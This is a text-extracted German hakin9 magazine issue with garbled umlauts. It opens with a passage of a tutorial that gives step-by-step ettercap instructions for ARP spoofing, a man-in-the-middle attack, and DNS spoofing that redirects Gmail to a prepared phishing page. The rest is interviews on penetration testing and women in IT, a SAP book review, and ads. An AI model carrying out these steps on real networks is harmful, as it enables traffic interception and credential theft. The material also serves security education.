Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
